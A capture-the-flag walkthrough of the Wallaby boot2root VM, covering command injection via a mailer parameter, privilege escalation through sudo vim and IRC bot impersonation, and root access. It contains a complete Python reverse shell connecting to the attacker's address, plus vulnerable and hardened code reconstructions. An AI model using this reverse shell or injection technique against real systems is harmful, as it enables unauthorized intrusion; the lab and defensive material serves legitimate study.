Virtualization Hardware: virtualbox
Host: Mac OSX
Attacker: Kali IP: 192.168.56.102
Victim: Wallaby IP: 192.168.56.101
This boot2root gave me some challenges along the way. I have been away from this for a bit and this was a big kick in the pants to try and get some of my knowledge back. As always I started out with a netdiscover to determine what IP was given to the virtual box on my host-only network. Once I did that I was able to run nmap on it to determine open ports.
I was able to find the typical open ports (22 and 80) as well as 6667 listed as a filtered IRC port. I will start with the HTTP port, but I will be keeping that IRC port in the back of my mind. Browsing through the site gives little information. I play with the username function for a bit and get familiar with the structure of the site. (/?page=)
I ran nikto on the site, and that's where things started to get interesting. I lost port 80. Running nmap again I see that 80 is no longer listed, but 60080 is now listed.
Browsing the new site the index pages have changed indicating that the vulnerable machine has detected that I was attempting to attack the machine. I guess that's what the description meant when it stated that the machine was a vector. Back to my nikto results, let's check out the /etc/passwd hint that it gave us.
It looks like we have stumbled across the /etc/passwd for the box. But, when looking at the page source I can see that this has been planted and is a fake.
Taking another approach I run dirb on the site http://192.168.56.101:60080/?page= in order to determine how many valid directories exist.
Taking a look at the list and trying the entries yields no success until I get to mailer. I finally get a valid page, but there isn't much information here. Looking at the page source I get a hint: /?page=mailer&mailer=ls
Trying the above address it returns the contents of the html directory. Now we are getting somewhere.
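The mailer page's back end is not shown on the page; all that is known is that whatever lands in the `mailer` parameter is executed by a shell. The following is an added example (my own reconstruction, not the VM's PHP) of the pattern that produces exactly that behaviour next to a hardened version. The recipient regex, the `/usr/sbin/sendmail` argv and the query strings used below are assumptions.

```python
import re
import subprocess
from urllib.parse import parse_qs


def mailer_vulnerable(query: str) -> str:
    """Hypothetical reconstruction of the observed behaviour:
    page=mailer&mailer=<value> hands <value> straight to /bin/sh,
    so mailer=ls lists the web root and mailer=wget ... fetches a file."""
    params = parse_qs(query)
    if params.get("page", [""])[0] != "mailer":
        return ""
    cmd = params.get("mailer", [""])[0]
    # shell=True is the whole bug: metacharacters and arbitrary commands are honoured.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Assumed policy: the parameter is supposed to be a recipient address, nothing else.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def mailer_hardened(query: str) -> list:
    """Same entry point, but the value is validated and passed as an argv element
    with no shell. Returns the argv that would be executed so it can be checked
    offline; a real handler would call subprocess.run(argv) with shell=False."""
    params = parse_qs(query)
    if params.get("page", [""])[0] != "mailer":
        raise ValueError("not the mailer page")
    recipient = params.get("mailer", [""])[0]
    if not EMAIL_RE.fullmatch(recipient):
        raise ValueError("rejected recipient: %r" % recipient)
    if recipient.startswith("-"):
        # Even without a shell, a leading '-' would be parsed by sendmail as an
        # option (argument injection), so reject it explicitly.
        raise ValueError("rejected recipient: %r" % recipient)
    return ["/usr/sbin/sendmail", recipient]
```

With `mailer=ls`, `mailer_vulnerable` returns a directory listing just as the box did; `mailer_hardened` refuses it because `ls` is not an address, and it also refuses `waldo@example.com;ls`, where the shell would have run the second command. The allowlist-then-argv approach removes the injection; it does not make the surrounding feature safe by itself (the web server still needs no write access to the document root, which is what let the reverse shell be dropped later).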
After playing around with it for a bit I figure out I can use wget to upload a PHP reverse shell. I had originally tried to transfer the file with netcat, but the response from the box was "How you gonna use nectar so obviously. Cmon man. This is all in the logs." The problem with wget is that it won't grab the file with the .php extension. That's okay: I drop the extension on my Kali box where I have the file hosted (I had to install apache2 on my Kali box and chmod 777 the file so that it could be grabbed by the victim box) and try again. Success! Now I cp the file to give it back its .php filename and I'm all set.
I setup my netcat listener on my kali box and navigate to http://192.168.56.101/reverse.php to gain a limited shell on the box.
I first look at /etc/passwd to see the real list. I find that there are three users on the box: waldo, wallaby and ircd. The IRC username has me thinking that the IRC port I had found earlier might play a role in gaining an elevated shell. First let me check what sudo privileges these users have on this box. Using sudo -l I find that all users have passwordless sudo access to iptables and that waldo has passwordless sudo access to another command.
Taking a look at sudo iptables -L I can see that the IRC port is blocked for external connections. Let's change that and see if we can get connected.
After changing the iptables I run nmap against the box again and I am able to get more information about the IRC port.
I am now able to join the IRC server using Hexchat, and using /list I find a channel called #walabyschat. I join the channel and see that there are already users on it: Waldo and wallabysbot. Wallaby must have some type of bot running on the IRC channel. Since no other information is available here, let me step back into the box and see what I can find.
Looking back at the directories on the box with my limited shell I am able to find that the home directories for the users are available for me to look at. It takes a while, but I finally find some useful information in wallaby's home folder. Apparently walabysbot is running a service called Sopel. A quick Google search later and I have found that if I type in .help I can interact with the bot and it will give me information about the commands that I can send the bot.
The bot returns a list of commands and one of them is .run. Trying .run ls gives me the response "Hold on, you aren't Waldo?" I guess I am going to have to become Waldo for the command to work. I try to use the command "/nick Waldo", but I get the error that Waldo is already in use.
Looking back on my notes, I remember the other no password sudo command that I found. Let me take a closer look at that.
The command that waldo can sudo without password is "/usr/bin/vim /etc/apache2/sites-available/000-default.conf." This will allow vim to open 000-default.conf and I can use that to manipulate the apache server. Next I run the command who in my limited shell and find the process id of our logged in user waldo.
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Now that I know the id (666), I just need to kill the process. Using sudo and the command from earlier I open the 000-default.conf file in vim and run :!kill 666. This kills Waldo's current session. A quick check of who confirms this.
I am now able to go back to my Hexchat session and use the command /nick waldo to change my name to waldo. Once done, I can now use the .run command with the bot to issue commands on the box.
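The bot's "Hold on, you aren't Waldo?" reply shows that .run is authorised by nickname alone, which is why killing the real session and taking the nick was enough. The following is an added example of mine, not Sopel's code or the bot on the box: a minimal PRIVMSG parser with two authorisation checks, the nick-only check the bot appears to use and a full hostmask check that tells the local waldo apart from an impersonator connecting from the Kali box. The sample lines are constructed; the idents and hosts in them are assumptions.

```python
# Constructed IRC lines modelled on the walkthrough. The first is the genuine
# local waldo session; the second is the attacker after taking the nick.
# Idents and hosts are assumed, they are not on the original page.
REAL_WALDO = ":waldo!~waldo@localhost PRIVMSG #walabyschat :.run ls"
IMPERSONATOR = ":waldo!~kali@192.168.56.102 PRIVMSG #walabyschat :.run ls"

REFUSAL = "Hold on, you aren't Waldo?"


def parse_privmsg(line: str):
    """Split ':nick!user@host PRIVMSG target :text' into its parts.
    Returns None for anything that is not a well-formed PRIVMSG."""
    parts = line.split(" ", 3)
    if len(parts) != 4 or parts[1] != "PRIVMSG" or not parts[0].startswith(":"):
        return None
    prefix = parts[0][1:]
    if "!" not in prefix or "@" not in prefix:
        return None
    nick, rest = prefix.split("!", 1)
    user, host = rest.split("@", 1)
    text = parts[3][1:] if parts[3].startswith(":") else parts[3]
    return {"nick": nick, "user": user, "host": host,
            "target": parts[2], "text": text}


def authorize_by_nick(msg, owner_nick="waldo"):
    """What the bot on the box appears to do: trust whoever holds the nick.
    Nicks are first come first served, so this fails as soon as the real
    owner's session is gone."""
    return msg["nick"].lower() == owner_nick


def authorize_by_hostmask(msg, owner_mask="waldo!~waldo@localhost"):
    """Tie trust to nick, ident and host together. This distinguishes the
    local session from a remote impersonator, but ident and host are only
    as trustworthy as the server's own checks; a services account is better."""
    mask = "%s!%s@%s" % (msg["nick"], msg["user"], msg["host"])
    return mask.lower() == owner_mask


def handle_run(line: str, authorize):
    """Emulate the bot's .run handler: returns None for non-.run traffic,
    the refusal string when authorisation fails, or the single argument
    the bot would execute (the walkthrough notes .run takes exactly one word)."""
    msg = parse_privmsg(line)
    if msg is None or not msg["text"].startswith(".run "):
        return None
    if not authorize(msg):
        return REFUSAL
    return msg["text"][len(".run "):].split(" ", 1)[0]
```

Run against the two constructed lines, the nick-only check lets the impersonator through exactly as the walkthrough shows, while the hostmask check refuses it. Neither check is a substitute for not exposing a command-execution bot to a channel at all; if such a command must exist, bind it to a services (NickServ) account, which a fresh connection cannot simply claim by typing /nick.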
Using the command whoami, I find that the commands are being run as Waldo. This would be helpful if the .run command allowed multiple words or arguments, but it doesn't. From my research earlier looking at the home folders, I know that Sopel runs on Python. I can create a script that runs a Python reverse shell, and Waldo will be the user that runs it. This should give me a shell as Waldo.
After playing around with several options, it looks like I will have to fetch the script with wget into the /tmp directory. From there I need to chmod +x the file to allow it to be executed.
Now all I need to do is setup a listener on my Kali box and have the IRC bot run my script.
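The page says a Python reverse shell was staged in /tmp and launched through .run; the script itself is not shown. The block below is an added example of my own, not the one used on the box: it connects back to a listener and hands /bin/sh the socket as its standard streams, returning the shell's exit status when the operator types exit. The attacker address matches the walkthrough's Kali box, but the port is an assumption since the page never states it.

```python
import socket
import subprocess

# Listener on the attacker side. The host is the walkthrough's Kali box; the
# port is assumed, the page does not say which one was used.
LHOST = "192.168.56.102"
LPORT = 4444


def reverse_shell(host: str, port: int) -> int:
    """Connect to host:port and run /bin/sh with stdin, stdout and stderr all
    pointed at the socket, so the listener types commands and sees output.
    Returns the shell's exit status once the remote side exits or disconnects."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # One fd for all three streams; Popen dup2()s it onto 0, 1 and 2 in the child.
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd, close_fds=True)
    status = proc.wait()
    sock.close()
    return status


if __name__ == "__main__":
    # Staged as /tmp/<name>, chmod +x, then launched by the bot as waldo.
    reverse_shell(LHOST, LPORT)
```

On the Kali side a plain `nc -lvnp 4444` receives the connection. The single-argument limit of .run is why the script takes no arguments at all: everything it needs is baked in, so the bot only has to be given the path.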
Now that I have a Waldo shell, let me try and access the /root directory. Denied.
Checking the sudo properties for Waldo using sudo -l I can see that Waldo should have ALL access to sudo with no password. That makes things simple. I now run "sudo ls /root" and see that the flag is sitting there. A simple "sudo cat /root/flag.txt" later and I have my flag.